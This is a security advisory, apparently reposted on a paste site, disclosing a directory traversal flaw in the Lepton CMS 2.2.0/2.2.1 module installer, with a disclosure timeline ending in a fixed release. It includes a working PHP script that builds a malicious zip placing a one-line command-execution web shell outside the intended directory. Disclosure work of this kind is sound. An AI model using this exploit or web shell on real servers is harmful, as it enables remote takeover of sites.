Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal

WebApplicationExploits     Text     18 August 2016    
  1. [+] Credits: John Page (HYP3RLINX)
  2.  
  3. [+] Website: hyp3rlinx.altervista.org
  4.  
  5. [+] Source:  http://hyp3rlinx.altervista.org/advisories/LEPTON-ARCHIVE-DIRECTORY-TRAVERSAL.txt
  6.  
  7. [+] ISR: ApparitionSec
  8.  
  9.  
  10. Vendor:
  11. ==================
  12. www.lepton-cms.org
  13.  
  14.  
  15. Product:
  16. =================================
  17. Lepton CMS 2.2.0 / 2.2.1 (update)
  18.  
  19. LEPTON is an easy-to-use but full customizable Content Management System (CMS).
  20.  
  21.  
  22. Vulnerability Type:
  23. ============================
  24. Archive Directory Traversal
  25.  
  26.  
  27. CVE Reference:
  28. ==============
  29. N/A
  30.  
  31.  
  32. Vulnerability Details:
  33. =====================
  34.  
  35. Lepton has feature that lets users install new modules, if malicious user uploads an archive and the module is not valid it
  36. will generate an error. However, the malicious archive will still get decompressed and no check is made for ../ characters in
  37. the file name allowing in arbitrary PHP files to be placed outside the intended target directory for installed modules. This can
  38. then be used to execute remote commands on the affected host system.
  39.  
  40. e.g.
  41.  
  42. We get error message as below.
  43.  
  44. under "Add Ons" tab Install Module.
  45. Invalid LEPTON installation file. Please check the *.zip format.[1]
  46.  
  47. Archive still gets decompressed and the malicious file is moved outside of the intended target directory, by using ../ in file name.
  48.  
  49.  
  50. Exploit code(s):
  51. ===============
  52.  
  53. <?php
  54. #Archive Directory Traversal to RCE exploit
  55. #==============================================
  56.  
  57. if($argc<2){echo "Usage: <filename>";exit();}
  58. $file_name=$argv[1];
  59.  
  60. $zip = new ZipArchive();
  61. $res = $zip->open("$file_name.zip", ZipArchive::CREATE);
  62. $zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '<?php exec($_GET["cmd"]); ?>');
  63. $zip->close();
  64.  
  65. echo "Malicious archive created...\r\n";
  66. echo "========= hyp3rlinx ============";
  67. ?>
  68.  
  69.  
  70. Disclosure Timeline:
  71. ===========================================================
  72. Attempted Vendor Notification: June 11, 2016 (No replies)
  73. Vendor Notification on July 12, 2016 ( thanks Henri Salo )
  74. Vendor Acknowledgement: July 13, 2016
  75. Vendor fixes: July 14, 2016
  76. Vendor release version 2.2.2 : August 12, 2016
  77. August 15, 2016  : Public Disclosure
  78.  
  79.  
  80. Exploitation Technique:
  81. =======================
  82. Local
  83.  
  84.  
  85. Severity Level:
  86. ================
  87. High
  88.  
  89.  
  90. [+] Disclaimer
  91. The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
  92. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
  93. that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
  94. is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
  95. for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
  96. or exploits by the author or elsewhere.
  97.  
  98. HYP3RLINX
  99.  
連絡先: info@paste.jp
Created by Paste.jp - v7.0